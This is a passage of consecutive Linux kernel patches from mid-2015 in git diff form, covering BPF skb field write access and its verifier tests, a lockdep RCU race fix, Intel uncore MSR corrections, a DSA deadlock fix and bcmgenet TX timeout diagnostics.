*/ rcu_read_lock(); list_for_each_entry_rcu(prog, &head->plist, link) { - int filter_res = BPF_PROG_RUN(prog->filter, skb); + int filter_res; + + if (at_ingress) { + /* It is safe to push/pull even if skb_shared() */ + __skb_push(skb, skb->mac_len); + filter_res = BPF_PROG_RUN(prog->filter, skb); + __skb_pull(skb, skb->mac_len); + } else { + filter_res = BPF_PROG_RUN(prog->filter, skb); + } if (filter_res == 0) continue; diff --git a/samples/bpf/tcbpf1_kern.c b/samples/bpf/tcbpf1_kern.c index 7c27710f8296..9bfb2eb34563 100644 --- a/samples/bpf/tcbpf1_kern.c +++ b/samples/bpf/tcbpf1_kern.c @@ -21,7 +21,7 @@ static inline void set_dst_mac(struct __sk_buff *skb, char *mac) static inline void set_ip_tos(struct __sk_buff *skb, __u8 new_tos) { - __u8 old_tos = load_byte(skb, BPF_LL_OFF + TOS_OFF); + __u8 old_tos = load_byte(skb, TOS_OFF); bpf_l3_csum_replace(skb, IP_CSUM_OFF, htons(old_tos), htons(new_tos), 2); bpf_skb_store_bytes(skb, TOS_OFF, &new_tos, sizeof(new_tos), 0); @@ -34,7 +34,7 @@ static inline void set_ip_tos(struct __sk_buff *skb, __u8 new_tos) static inline void set_tcp_ip_src(struct __sk_buff *skb, __u32 new_ip) { - __u32 old_ip = _htonl(load_word(skb, BPF_LL_OFF + IP_SRC_OFF)); + __u32 old_ip = _htonl(load_word(skb, IP_SRC_OFF)); bpf_l4_csum_replace(skb, TCP_CSUM_OFF, old_ip, new_ip, IS_PSEUDO | sizeof(new_ip)); bpf_l3_csum_replace(skb, IP_CSUM_OFF, old_ip, new_ip, sizeof(new_ip)); @@ -44,7 +44,7 @@ static inline void set_tcp_ip_src(struct __sk_buff *skb, __u32 new_ip) #define TCP_DPORT_OFF (ETH_HLEN + sizeof(struct iphdr) + offsetof(struct tcphdr, dest)) static inline void set_tcp_dest_port(struct __sk_buff *skb, __u16 new_port) { - __u16 old_port = htons(load_half(skb, BPF_LL_OFF + TCP_DPORT_OFF)); + __u16 old_port = htons(load_half(skb, TCP_DPORT_OFF)); bpf_l4_csum_replace(skb, TCP_CSUM_OFF, old_port, new_port, sizeof(new_port)); bpf_skb_store_bytes(skb, TCP_DPORT_OFF, &new_port, sizeof(new_port), 0); @@ -53,7 +53,7 @@ static inline void set_tcp_dest_port(struct __sk_buff *skb, __u16 new_port) SEC("classifier") int bpf_prog1(struct __sk_buff *skb) { - __u8 proto = load_byte(skb, BPF_LL_OFF + ETH_HLEN + offsetof(struct iphdr, protocol)); + __u8 proto = load_byte(skb, ETH_HLEN + offsetof(struct iphdr, protocol)); long *value; if (proto == IPPROTO_TCP) { From d691f9e8d4405c334aa10d556e73c8bf44cb0e01 Mon Sep 17 00:00:00 2001 From: Alexei Starovoitov Date: Thu, 4 Jun 2015 10:11:54 -0700 Subject: [PATCH 748/872] bpf: allow programs to write to certain skb fields allow programs read/write skb->mark, tc_index fields and ((struct qdisc_skb_cb *)cb)->data. mark and tc_index are generically useful in TC. cb[0]-cb[4] are primarily used to pass arguments from one program to another called via bpf_tail_call() which can be seen in sockex3_kern.c example. All fields of 'struct __sk_buff' are readable to socket and tc_cls_act progs. mark, tc_index are writeable from tc_cls_act only. cb[0]-cb[4] are writeable by both sockets and tc_cls_act. Add verifier tests and improve sample code. Signed-off-by: Alexei Starovoitov Signed-off-by: David S. 
Miller --- include/linux/bpf.h | 3 +- include/uapi/linux/bpf.h | 2 + kernel/bpf/verifier.c | 37 +++++++++++---- net/core/filter.c | 94 ++++++++++++++++++++++++++++++++----- samples/bpf/sockex3_kern.c | 35 +++++--------- samples/bpf/test_verifier.c | 84 ++++++++++++++++++++++++++++++++- 6 files changed, 207 insertions(+), 48 deletions(-) diff --git a/include/linux/bpf.h b/include/linux/bpf.h index ca854e5bb2f7..2235aee8096a 100644 --- a/include/linux/bpf.h +++ b/include/linux/bpf.h @@ -105,7 +105,8 @@ struct bpf_verifier_ops { */ bool (*is_valid_access)(int off, int size, enum bpf_access_type type); - u32 (*convert_ctx_access)(int dst_reg, int src_reg, int ctx_off, + u32 (*convert_ctx_access)(enum bpf_access_type type, int dst_reg, + int src_reg, int ctx_off, struct bpf_insn *insn); }; diff --git a/include/uapi/linux/bpf.h b/include/uapi/linux/bpf.h index 42aa19abab86..602f05b7a275 100644 --- a/include/uapi/linux/bpf.h +++ b/include/uapi/linux/bpf.h @@ -248,6 +248,8 @@ struct __sk_buff { __u32 priority; __u32 ingress_ifindex; __u32 ifindex; + __u32 tc_index; + __u32 cb[5]; }; #endif /* _UAPI__LINUX_BPF_H__ */ diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c index cfd9a40b9a5a..039d866fd36a 100644 --- a/kernel/bpf/verifier.c +++ b/kernel/bpf/verifier.c @@ -1692,6 +1692,8 @@ static int do_check(struct verifier_env *env) } } else if (class == BPF_STX) { + enum bpf_reg_type dst_reg_type; + if (BPF_MODE(insn->code) == BPF_XADD) { err = check_xadd(env, insn); if (err) @@ -1700,11 +1702,6 @@ static int do_check(struct verifier_env *env) continue; } - if (BPF_MODE(insn->code) != BPF_MEM || - insn->imm != 0) { - verbose("BPF_STX uses reserved fields\n"); - return -EINVAL; - } /* check src1 operand */ err = check_reg_arg(regs, insn->src_reg, SRC_OP); if (err) @@ -1714,6 +1711,8 @@ static int do_check(struct verifier_env *env) if (err) return err; + dst_reg_type = regs[insn->dst_reg].type; + /* check that memory (dst_reg + off) is writeable */ err = check_mem_access(env, insn->dst_reg, insn->off, BPF_SIZE(insn->code), BPF_WRITE, @@ -1721,6 +1720,15 @@ static int do_check(struct verifier_env *env) if (err) return err; + if (insn->imm == 0) { + insn->imm = dst_reg_type; + } else if (dst_reg_type != insn->imm && + (dst_reg_type == PTR_TO_CTX || + insn->imm == PTR_TO_CTX)) { + verbose("same insn cannot be used with different pointers\n"); + return -EINVAL; + } + } else if (class == BPF_ST) { if (BPF_MODE(insn->code) != BPF_MEM || insn->src_reg != BPF_REG_0) { @@ -1839,12 +1847,18 @@ static int replace_map_fd_with_map_ptr(struct verifier_env *env) for (i = 0; i < insn_cnt; i++, insn++) { if (BPF_CLASS(insn->code) == BPF_LDX && - (BPF_MODE(insn->code) != BPF_MEM || - insn->imm != 0)) { + (BPF_MODE(insn->code) != BPF_MEM || insn->imm != 0)) { verbose("BPF_LDX uses reserved fields\n"); return -EINVAL; } + if (BPF_CLASS(insn->code) == BPF_STX && + ((BPF_MODE(insn->code) != BPF_MEM && + BPF_MODE(insn->code) != BPF_XADD) || insn->imm != 0)) { + verbose("BPF_STX uses reserved fields\n"); + return -EINVAL; + } + if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) { struct bpf_map *map; struct fd f; @@ -1967,12 +1981,17 @@ static int convert_ctx_accesses(struct verifier_env *env) struct bpf_prog *new_prog; u32 cnt; int i; + enum bpf_access_type type; if (!env->prog->aux->ops->convert_ctx_access) return 0; for (i = 0; i < insn_cnt; i++, insn++) { - if (insn->code != (BPF_LDX | BPF_MEM | BPF_W)) + if (insn->code == (BPF_LDX | BPF_MEM | BPF_W)) + type = BPF_READ; + else if (insn->code == (BPF_STX | BPF_MEM | 
BPF_W)) + type = BPF_WRITE; + else continue; if (insn->imm != PTR_TO_CTX) { @@ -1982,7 +2001,7 @@ static int convert_ctx_accesses(struct verifier_env *env) } cnt = env->prog->aux->ops-> - convert_ctx_access(insn->dst_reg, insn->src_reg, + convert_ctx_access(type, insn->dst_reg, insn->src_reg, insn->off, insn_buf); if (cnt == 0 || cnt >= ARRAY_SIZE(insn_buf)) { verbose("bpf verifier is misconfigured\n"); diff --git a/net/core/filter.c b/net/core/filter.c index 36a69e33d76b..d271c06bf01f 100644 --- a/net/core/filter.c +++ b/net/core/filter.c @@ -46,6 +46,7 @@ #include #include #include +#include /** * sk_filter - run a packet through a socket filter @@ -1463,13 +1464,8 @@ tc_cls_act_func_proto(enum bpf_func_id func_id) } } -static bool sk_filter_is_valid_access(int off, int size, - enum bpf_access_type type) +static bool __is_valid_access(int off, int size, enum bpf_access_type type) { - /* only read is allowed */ - if (type != BPF_READ) - return false; - /* check bounds */ if (off < 0 || off >= sizeof(struct __sk_buff)) return false; @@ -1485,8 +1481,42 @@ static bool sk_filter_is_valid_access(int off, int size, return true; } -static u32 sk_filter_convert_ctx_access(int dst_reg, int src_reg, int ctx_off, - struct bpf_insn *insn_buf) +static bool sk_filter_is_valid_access(int off, int size, + enum bpf_access_type type) +{ + if (type == BPF_WRITE) { + switch (off) { + case offsetof(struct __sk_buff, cb[0]) ... + offsetof(struct __sk_buff, cb[4]): + break; + default: + return false; + } + } + + return __is_valid_access(off, size, type); +} + +static bool tc_cls_act_is_valid_access(int off, int size, + enum bpf_access_type type) +{ + if (type == BPF_WRITE) { + switch (off) { + case offsetof(struct __sk_buff, mark): + case offsetof(struct __sk_buff, tc_index): + case offsetof(struct __sk_buff, cb[0]) ... + offsetof(struct __sk_buff, cb[4]): + break; + default: + return false; + } + } + return __is_valid_access(off, size, type); +} + +static u32 bpf_net_convert_ctx_access(enum bpf_access_type type, int dst_reg, + int src_reg, int ctx_off, + struct bpf_insn *insn_buf) { struct bpf_insn *insn = insn_buf; @@ -1538,7 +1568,15 @@ static u32 sk_filter_convert_ctx_access(int dst_reg, int src_reg, int ctx_off, break; case offsetof(struct __sk_buff, mark): - return convert_skb_access(SKF_AD_MARK, dst_reg, src_reg, insn); + BUILD_BUG_ON(FIELD_SIZEOF(struct sk_buff, mark) != 4); + + if (type == BPF_WRITE) + *insn++ = BPF_STX_MEM(BPF_W, dst_reg, src_reg, + offsetof(struct sk_buff, mark)); + else + *insn++ = BPF_LDX_MEM(BPF_W, dst_reg, src_reg, + offsetof(struct sk_buff, mark)); + break; case offsetof(struct __sk_buff, pkt_type): return convert_skb_access(SKF_AD_PKTTYPE, dst_reg, src_reg, insn); @@ -1553,6 +1591,38 @@ static u32 sk_filter_convert_ctx_access(int dst_reg, int src_reg, int ctx_off, case offsetof(struct __sk_buff, vlan_tci): return convert_skb_access(SKF_AD_VLAN_TAG, dst_reg, src_reg, insn); + + case offsetof(struct __sk_buff, cb[0]) ... 
+ offsetof(struct __sk_buff, cb[4]): + BUILD_BUG_ON(FIELD_SIZEOF(struct qdisc_skb_cb, data) < 20); + + ctx_off -= offsetof(struct __sk_buff, cb[0]); + ctx_off += offsetof(struct sk_buff, cb); + ctx_off += offsetof(struct qdisc_skb_cb, data); + if (type == BPF_WRITE) + *insn++ = BPF_STX_MEM(BPF_W, dst_reg, src_reg, ctx_off); + else + *insn++ = BPF_LDX_MEM(BPF_W, dst_reg, src_reg, ctx_off); + break; + + case offsetof(struct __sk_buff, tc_index): +#ifdef CONFIG_NET_SCHED + BUILD_BUG_ON(FIELD_SIZEOF(struct sk_buff, tc_index) != 2); + + if (type == BPF_WRITE) + *insn++ = BPF_STX_MEM(BPF_H, dst_reg, src_reg, + offsetof(struct sk_buff, tc_index)); + else + *insn++ = BPF_LDX_MEM(BPF_H, dst_reg, src_reg, + offsetof(struct sk_buff, tc_index)); + break; +#else + if (type == BPF_WRITE) + *insn++ = BPF_MOV64_REG(dst_reg, dst_reg); + else + *insn++ = BPF_MOV64_IMM(dst_reg, 0); + break; +#endif } return insn - insn_buf; @@ -1561,13 +1631,13 @@ static u32 sk_filter_convert_ctx_access(int dst_reg, int src_reg, int ctx_off, static const struct bpf_verifier_ops sk_filter_ops = { .get_func_proto = sk_filter_func_proto, .is_valid_access = sk_filter_is_valid_access, - .convert_ctx_access = sk_filter_convert_ctx_access, + .convert_ctx_access = bpf_net_convert_ctx_access, }; static const struct bpf_verifier_ops tc_cls_act_ops = { .get_func_proto = tc_cls_act_func_proto, - .is_valid_access = sk_filter_is_valid_access, - .convert_ctx_access = sk_filter_convert_ctx_access, + .is_valid_access = tc_cls_act_is_valid_access, + .convert_ctx_access = bpf_net_convert_ctx_access, }; static struct bpf_prog_type_list sk_filter_type __read_mostly = { diff --git a/samples/bpf/sockex3_kern.c b/samples/bpf/sockex3_kern.c index 2625b987944f..41ae2fd21b13 100644 --- a/samples/bpf/sockex3_kern.c +++ b/samples/bpf/sockex3_kern.c @@ -89,7 +89,6 @@ static inline __u32 ipv6_addr_hash(struct __sk_buff *ctx, __u64 off) struct globals { struct flow_keys flow; - __u32 nhoff; }; struct bpf_map_def SEC("maps") percpu_map = { @@ -139,7 +138,7 @@ static void update_stats(struct __sk_buff *skb, struct globals *g) static __always_inline void parse_ip_proto(struct __sk_buff *skb, struct globals *g, __u32 ip_proto) { - __u32 nhoff = g->nhoff; + __u32 nhoff = skb->cb[0]; int poff; switch (ip_proto) { @@ -165,7 +164,7 @@ static __always_inline void parse_ip_proto(struct __sk_buff *skb, if (gre_flags & GRE_SEQ) nhoff += 4; - g->nhoff = nhoff; + skb->cb[0] = nhoff; parse_eth_proto(skb, gre_proto); break; } @@ -195,7 +194,7 @@ PROG(PARSE_IP)(struct __sk_buff *skb) if (!g) return 0; - nhoff = g->nhoff; + nhoff = skb->cb[0]; if (unlikely(ip_is_fragment(skb, nhoff))) return 0; @@ -210,7 +209,7 @@ PROG(PARSE_IP)(struct __sk_buff *skb) verlen = load_byte(skb, nhoff + 0/*offsetof(struct iphdr, ihl)*/); nhoff += (verlen & 0xF) << 2; - g->nhoff = nhoff; + skb->cb[0] = nhoff; parse_ip_proto(skb, g, ip_proto); return 0; } @@ -223,7 +222,7 @@ PROG(PARSE_IPV6)(struct __sk_buff *skb) if (!g) return 0; - nhoff = g->nhoff; + nhoff = skb->cb[0]; ip_proto = load_byte(skb, nhoff + offsetof(struct ipv6hdr, nexthdr)); @@ -233,25 +232,21 @@ PROG(PARSE_IPV6)(struct __sk_buff *skb) nhoff + offsetof(struct ipv6hdr, daddr)); nhoff += sizeof(struct ipv6hdr); - g->nhoff = nhoff; + skb->cb[0] = nhoff; parse_ip_proto(skb, g, ip_proto); return 0; } PROG(PARSE_VLAN)(struct __sk_buff *skb) { - struct globals *g = this_cpu_globals(); __u32 nhoff, proto; - if (!g) - return 0; - - nhoff = g->nhoff; + nhoff = skb->cb[0]; proto = load_half(skb, nhoff + offsetof(struct vlan_hdr, 
h_vlan_encapsulated_proto)); nhoff += sizeof(struct vlan_hdr); - g->nhoff = nhoff; + skb->cb[0] = nhoff; parse_eth_proto(skb, proto); @@ -260,17 +255,13 @@ PROG(PARSE_VLAN)(struct __sk_buff *skb) PROG(PARSE_MPLS)(struct __sk_buff *skb) { - struct globals *g = this_cpu_globals(); __u32 nhoff, label; - if (!g) - return 0; - - nhoff = g->nhoff; + nhoff = skb->cb[0]; label = load_word(skb, nhoff); nhoff += sizeof(struct mpls_label); - g->nhoff = nhoff; + skb->cb[0] = nhoff; if (label & MPLS_LS_S_MASK) { __u8 verlen = load_byte(skb, nhoff); @@ -288,14 +279,10 @@ PROG(PARSE_MPLS)(struct __sk_buff *skb) SEC("socket/0") int main_prog(struct __sk_buff *skb) { - struct globals *g = this_cpu_globals(); __u32 nhoff = ETH_HLEN; __u32 proto = load_half(skb, 12); - if (!g) - return 0; - - g->nhoff = nhoff; + skb->cb[0] = nhoff; parse_eth_proto(skb, proto); return 0; } diff --git a/samples/bpf/test_verifier.c b/samples/bpf/test_verifier.c index 12f3780af73f..693605997abc 100644 --- a/samples/bpf/test_verifier.c +++ b/samples/bpf/test_verifier.c @@ -29,6 +29,7 @@ struct bpf_test { ACCEPT, REJECT } result; + enum bpf_prog_type prog_type; }; static struct bpf_test tests[] = { @@ -743,6 +744,84 @@ static struct bpf_test tests[] = { .errstr = "different pointers", .result = REJECT, }, + { + "check skb->mark is not writeable by sockets", + .insns = { + BPF_STX_MEM(BPF_W, BPF_REG_1, BPF_REG_1, + offsetof(struct __sk_buff, mark)), + BPF_EXIT_INSN(), + }, + .errstr = "invalid bpf_context access", + .result = REJECT, + }, + { + "check skb->tc_index is not writeable by sockets", + .insns = { + BPF_STX_MEM(BPF_W, BPF_REG_1, BPF_REG_1, + offsetof(struct __sk_buff, tc_index)), + BPF_EXIT_INSN(), + }, + .errstr = "invalid bpf_context access", + .result = REJECT, + }, + { + "check non-u32 access to cb", + .insns = { + BPF_STX_MEM(BPF_H, BPF_REG_1, BPF_REG_1, + offsetof(struct __sk_buff, cb[0])), + BPF_EXIT_INSN(), + }, + .errstr = "invalid bpf_context access", + .result = REJECT, + }, + { + "check out of range skb->cb access", + .insns = { + BPF_LDX_MEM(BPF_W, BPF_REG_0, BPF_REG_1, + offsetof(struct __sk_buff, cb[60])), + BPF_EXIT_INSN(), + }, + .errstr = "invalid bpf_context access", + .result = REJECT, + .prog_type = BPF_PROG_TYPE_SCHED_ACT, + }, + { + "write skb fields from socket prog", + .insns = { + BPF_LDX_MEM(BPF_W, BPF_REG_0, BPF_REG_1, + offsetof(struct __sk_buff, cb[4])), + BPF_JMP_IMM(BPF_JGE, BPF_REG_0, 0, 1), + BPF_LDX_MEM(BPF_W, BPF_REG_0, BPF_REG_1, + offsetof(struct __sk_buff, mark)), + BPF_LDX_MEM(BPF_W, BPF_REG_0, BPF_REG_1, + offsetof(struct __sk_buff, tc_index)), + BPF_JMP_IMM(BPF_JGE, BPF_REG_0, 0, 1), + BPF_STX_MEM(BPF_W, BPF_REG_1, BPF_REG_1, + offsetof(struct __sk_buff, cb[0])), + BPF_STX_MEM(BPF_W, BPF_REG_1, BPF_REG_1, + offsetof(struct __sk_buff, cb[2])), + BPF_EXIT_INSN(), + }, + .result = ACCEPT, + }, + { + "write skb fields from tc_cls_act prog", + .insns = { + BPF_LDX_MEM(BPF_W, BPF_REG_0, BPF_REG_1, + offsetof(struct __sk_buff, cb[0])), + BPF_STX_MEM(BPF_W, BPF_REG_1, BPF_REG_0, + offsetof(struct __sk_buff, mark)), + BPF_LDX_MEM(BPF_W, BPF_REG_0, BPF_REG_1, + offsetof(struct __sk_buff, tc_index)), + BPF_STX_MEM(BPF_W, BPF_REG_1, BPF_REG_0, + offsetof(struct __sk_buff, tc_index)), + BPF_STX_MEM(BPF_W, BPF_REG_1, BPF_REG_0, + offsetof(struct __sk_buff, cb[3])), + BPF_EXIT_INSN(), + }, + .result = ACCEPT, + .prog_type = BPF_PROG_TYPE_SCHED_CLS, + }, }; static int probe_filter_length(struct bpf_insn *fp) @@ -775,6 +854,7 @@ static int test(void) for (i = 0; i < ARRAY_SIZE(tests); i++) { 
struct bpf_insn *prog = tests[i].insns; + int prog_type = tests[i].prog_type; int prog_len = probe_filter_length(prog); int *fixup = tests[i].fixup; int map_fd = -1; @@ -789,8 +869,8 @@ static int test(void) } printf("#%d %s ", i, tests[i].descr); - prog_fd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, prog, - prog_len * sizeof(struct bpf_insn), + prog_fd = bpf_prog_load(prog_type ?: BPF_PROG_TYPE_SOCKET_FILTER, + prog, prog_len * sizeof(struct bpf_insn), "GPL", 0); if (tests[i].result == ACCEPT) { From cee34d88cabd1ba5fc93e09b5b12232bc9338c7c Mon Sep 17 00:00:00 2001 From: Peter Zijlstra Date: Tue, 2 Jun 2015 12:50:13 +0200 Subject: [PATCH 749/872] lockdep: Fix a race between /proc/lock_stat and module unload The lock_class iteration of /proc/lock_stat is not serialized against the lockdep_free_key_range() call from module unload. Therefore it can happen that we find a class of which ->name/->key are no longer valid. There is a further bug in zap_class() that left ->name dangling. Cure this. Use RCU_INIT_POINTER() because NULL. Since lockdep_free_key_range() is rcu_sched serialized, we can read both ->name and ->key under rcu_read_lock_sched() (preempt-disable) and be assured that if we observe a !NULL value it stays safe to use for as long as we hold that lock. If we observe both NULL, skip the entry. Reported-by: Jerome Marchand Tested-by: Jerome Marchand Signed-off-by: Peter Zijlstra (Intel) Cc: Andrew Morton Cc: H. Peter Anvin Cc: Linus Torvalds Cc: Peter Zijlstra Cc: Thomas Gleixner Link: http://lkml.kernel.org/r/20150602105013.GS3644@twins.programming.kicks-ass.net Signed-off-by: Ingo Molnar --- kernel/locking/lockdep.c | 3 ++- kernel/locking/lockdep_proc.c | 22 +++++++++++++++++----- 2 files changed, 19 insertions(+), 6 deletions(-) diff --git a/kernel/locking/lockdep.c b/kernel/locking/lockdep.c index a0831e1b99f4..aaeae885d9af 100644 --- a/kernel/locking/lockdep.c +++ b/kernel/locking/lockdep.c @@ -3900,7 +3900,8 @@ static void zap_class(struct lock_class *class) list_del_rcu(&class->hash_entry); list_del_rcu(&class->lock_entry); - class->key = NULL; + RCU_INIT_POINTER(class->key, NULL); + RCU_INIT_POINTER(class->name, NULL); } static inline int within(const void *addr, void *start, unsigned long size) diff --git a/kernel/locking/lockdep_proc.c b/kernel/locking/lockdep_proc.c index ef43ac4bafb5..d83d798bef95 100644 --- a/kernel/locking/lockdep_proc.c +++ b/kernel/locking/lockdep_proc.c @@ -426,10 +426,12 @@ static void seq_lock_time(struct seq_file *m, struct lock_time *lt) static void seq_stats(struct seq_file *m, struct lock_stat_data *data) { - char name[39]; - struct lock_class *class; + struct lockdep_subclass_key *ckey; struct lock_class_stats *stats; + struct lock_class *class; + const char *cname; int i, namelen; + char name[39]; class = data->class; stats = &data->stats; @@ -440,15 +442,25 @@ static void seq_stats(struct seq_file *m, struct lock_stat_data *data) if (class->subclass) namelen -= 2; - if (!class->name) { + rcu_read_lock_sched(); + cname = rcu_dereference_sched(class->name); + ckey = rcu_dereference_sched(class->key); + + if (!cname && !ckey) { + rcu_read_unlock_sched(); + return; + + } else if (!cname) { char str[KSYM_NAME_LEN]; const char *key_name; - key_name = __get_key_name(class->key, str); + key_name = __get_key_name(ckey, str); snprintf(name, namelen, "%s", key_name); } else { - snprintf(name, namelen, "%s", class->name); + snprintf(name, namelen, "%s", cname); } + rcu_read_unlock_sched(); + namelen = strlen(name); if (class->name_version > 1) { 
snprintf(name+namelen, 3, "#%d", class->name_version); From 8cf1a3de97804b047973dd44cfacdc1930da8403 Mon Sep 17 00:00:00 2001 From: Kan Liang Date: Tue, 26 May 2015 09:10:35 -0400 Subject: [PATCH 750/872] perf/x86/intel/uncore: Fix CBOX bit wide and UBOX reg on Haswell-EP CBOX counters are increased to 48b on HSX. Correct the MSR address for HSWEP_U_MSR_PMON_CTR0 and HSWEP_U_MSR_PMON_CTL0. See specification in: http://www.intel.com/content/www/us/en/processors/xeon/ xeon-e5-v3-uncore-performance-monitoring.html Signed-off-by: Kan Liang Signed-off-by: Peter Zijlstra (Intel) Cc: Andrew Morton Cc: H. Peter Anvin Cc: Linus Torvalds Cc: Peter Zijlstra Cc: Thomas Gleixner Link: http://lkml.kernel.org/r/1432645835-7918-1-git-send-email-kan.liang@intel.com Signed-off-by: Ingo Molnar --- arch/x86/kernel/cpu/perf_event_intel_uncore_snbep.c | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/arch/x86/kernel/cpu/perf_event_intel_uncore_snbep.c b/arch/x86/kernel/cpu/perf_event_intel_uncore_snbep.c index 12d9548457e7..6d6e85dd5849 100644 --- a/arch/x86/kernel/cpu/perf_event_intel_uncore_snbep.c +++ b/arch/x86/kernel/cpu/perf_event_intel_uncore_snbep.c @@ -164,8 +164,8 @@ ((1ULL << (n)) - 1))) /* Haswell-EP Ubox */ -#define HSWEP_U_MSR_PMON_CTR0 0x705 -#define HSWEP_U_MSR_PMON_CTL0 0x709 +#define HSWEP_U_MSR_PMON_CTR0 0x709 +#define HSWEP_U_MSR_PMON_CTL0 0x705 #define HSWEP_U_MSR_PMON_FILTER 0x707 #define HSWEP_U_MSR_PMON_UCLK_FIXED_CTL 0x703 @@ -1914,7 +1914,7 @@ static struct intel_uncore_type hswep_uncore_cbox = { .name = "cbox", .num_counters = 4, .num_boxes = 18, - .perf_ctr_bits = 44, + .perf_ctr_bits = 48, .event_ctl = HSWEP_C0_MSR_PMON_CTL0, .perf_ctr = HSWEP_C0_MSR_PMON_CTR0, .event_mask = SNBEP_CBO_MSR_PMON_RAW_EVENT_MASK, From 80edb722b919500450e83c49c20a9dc706de2fa6 Mon Sep 17 00:00:00 2001 From: Andrew Lunn Date: Fri, 5 Jun 2015 01:10:09 +0200 Subject: [PATCH 751/872] net: dsa: mv88e6xxx: Fix deadlock by double lock ethtool -S on a DSA interface can deadlock for some switches because the same lock is taken twice. Use the register read function which expects the lock to be already held. Signed-off-by: Andrew Lunn Fixes: 31888234b736 ("net: dsa: mv88e6xxx: Replace stats mutex with SMI mutex") Signed-off-by: David S. Miller --- drivers/net/dsa/mv88e6xxx.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/dsa/mv88e6xxx.c b/drivers/net/dsa/mv88e6xxx.c index 7fba330ce702..39530fa142b0 100644 --- a/drivers/net/dsa/mv88e6xxx.c +++ b/drivers/net/dsa/mv88e6xxx.c @@ -703,8 +703,8 @@ static void _mv88e6xxx_get_ethtool_stats(struct dsa_switch *ds, u32 high = 0; if (s->reg >= 0x100) { - ret = mv88e6xxx_reg_read(ds, REG_PORT(port), - s->reg - 0x100); + ret = _mv88e6xxx_reg_read(ds, REG_PORT(port), + s->reg - 0x100); if (ret < 0) goto error; low = ret; From 13ea657806cf73b379a0109f7042182f47c351a7 Mon Sep 17 00:00:00 2001 From: Florian Fainelli Date: Thu, 4 Jun 2015 16:15:50 -0700 Subject: [PATCH 752/872] net: bcmgenet: improve TX timeout Dump useful ring statistics along with interrupt status, software maintained pointers and hardware registers to help troubleshoot TX queue stalls. When a timeout occurs, disable TX NAPI for the rings, dump their states while interrupts are disabled, re-enable interrupts, NAPI and queue flow control to help with the recovery. Signed-off-by: Florian Fainelli Signed-off-by: David S. 
Miller --- .../net/ethernet/broadcom/genet/bcmgenet.c | 67 +++++++++++++++++++ 1 file changed, 67 insertions(+) diff --git a/drivers/net/ethernet/broadcom/genet/bcmgenet.c b/drivers/net/ethernet/broadcom/genet/bcmgenet.c index 6043734ea613..b43b2cb9b830 100644 --- a/drivers/net/ethernet/broadcom/genet/bcmgenet.c +++ b/drivers/net/ethernet/broadcom/genet/bcmgenet.c @@ -2770,12 +2770,79 @@ static int bcmgenet_close(struct net_device *dev) return ret; } +static void bcmgenet_dump_tx_queue(struct bcmgenet_tx_ring *ring) +{ + struct bcmgenet_priv *priv = ring->priv; + u32 p_index, c_index, intsts, intmsk; + struct netdev_queue *txq; + unsigned int free_bds; + unsigned long flags; + bool txq_stopped; + + if (!netif_msg_tx_err(priv)) + return; + + txq = netdev_get_tx_queue(priv->dev, ring->queue); + + spin_lock_irqsave(&ring->lock, flags); + if (ring->index == DESC_INDEX) { + intsts = ~bcmgenet_intrl2_0_readl(priv, INTRL2_CPU_MASK_STATUS); + intmsk = UMAC_IRQ_TXDMA_DONE | UMAC_IRQ_TXDMA_MBDONE; + } else { + intsts = ~bcmgenet_intrl2_1_readl(priv, INTRL2_CPU_MASK_STATUS); + intmsk = 1 << ring->index; + } + c_index = bcmgenet_tdma_ring_readl(priv, ring->index, TDMA_CONS_INDEX); + p_index = bcmgenet_tdma_ring_readl(priv, ring->index, TDMA_PROD_INDEX); + txq_stopped = netif_tx_queue_stopped(txq); + free_bds = ring->free_bds; + spin_unlock_irqrestore(&ring->lock, flags); + + netif_err(priv, tx_err, priv->dev, "Ring %d queue %d status summary\n" + "TX queue status: %s, interrupts: %s\n" + "(sw)free_bds: %d (sw)size: %d\n" + "(sw)p_index: %d (hw)p_index: %d\n" + "(sw)c_index: %d (hw)c_index: %d\n" + "(sw)clean_p: %d (sw)write_p: %d\n" + "(sw)cb_ptr: %d (sw)end_ptr: %d\n", + ring->index, ring->queue, + txq_stopped ? "stopped" : "active", + intsts & intmsk ? "enabled" : "disabled", + free_bds, ring->size, + ring->prod_index, p_index & DMA_P_INDEX_MASK, + ring->c_index, c_index & DMA_C_INDEX_MASK, + ring->clean_ptr, ring->write_ptr, + ring->cb_ptr, ring->end_ptr); +} + static void bcmgenet_timeout(struct net_device *dev) { struct bcmgenet_priv *priv = netdev_priv(dev); + u32 int0_enable = 0; + u32 int1_enable = 0; + unsigned int q; netif_dbg(priv, tx_err, dev, "bcmgenet_timeout\n"); + bcmgenet_disable_tx_napi(priv); + + for (q = 0; q < priv->hw_params->tx_queues; q++) + bcmgenet_dump_tx_queue(&priv->tx_rings[q]); + bcmgenet_dump_tx_queue(&priv->tx_rings[DESC_INDEX]); + + bcmgenet_tx_reclaim_all(dev); + + for (q = 0; q < priv->hw_params->tx_queues; q++) + int1_enable |= (1 << q); + + int0_enable = UMAC_IRQ_TXDMA_DONE; + + /* Re-enable TX interrupts if disabled */ + bcmgenet_intrl2_0_writel(priv, int0_enable, INTRL2_CPU_MASK_CLEAR); + bcmgenet_intrl2_1_writel(priv, int1_enable, INTRL2_CPU_MASK_CLEAR); + + bcmgenet_enable_tx_napi(priv); + dev->trans_start = jiffies; dev->stats.tx_errors++; From b80c0e78582d4a3a004dc1ade4eb06babc6a4eea Mon Sep 17 00:00:00 2001 From: Eric Dumazet Date: Thu, 4 Jun 2015 18:30:43 -0700 Subject: [PATCH 753/872] tcp: get_cookie_sock() consolidation IPv4 and IPv6 share same implementation of get_cookie_sock(), and there is no point inlining it. We add tcp_ prefix to the common helper name and export it. Signed-off-by: Eric Dumazet Signed-off-by: David S. 
